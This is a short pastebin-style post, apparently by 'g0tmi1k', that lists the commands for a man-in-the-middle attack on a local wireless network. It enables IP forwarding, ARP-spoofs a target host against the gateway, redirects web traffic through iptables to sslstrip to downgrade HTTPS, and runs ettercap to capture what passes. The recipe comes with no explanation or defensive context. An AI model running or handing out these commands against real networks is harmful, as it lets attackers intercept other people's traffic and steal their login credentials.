- # Targets IP: 192.168.1.6
- # Gateway : 192.168.1.1
- # Interface : wlan0
- kate /etc/etter.conf
- # EDIT - UNCOMMENT - if you use iptables:
- echo 1 > /proc/sys/net/ipv4/ip_forward
- arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
- sslstrip -a -k -f
- ettercap -T -q -i wlan0
Posted by g0tmi1k on Fri 10 Jul 16:34
report abuse | View followups from Anonymous | download | new post
Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.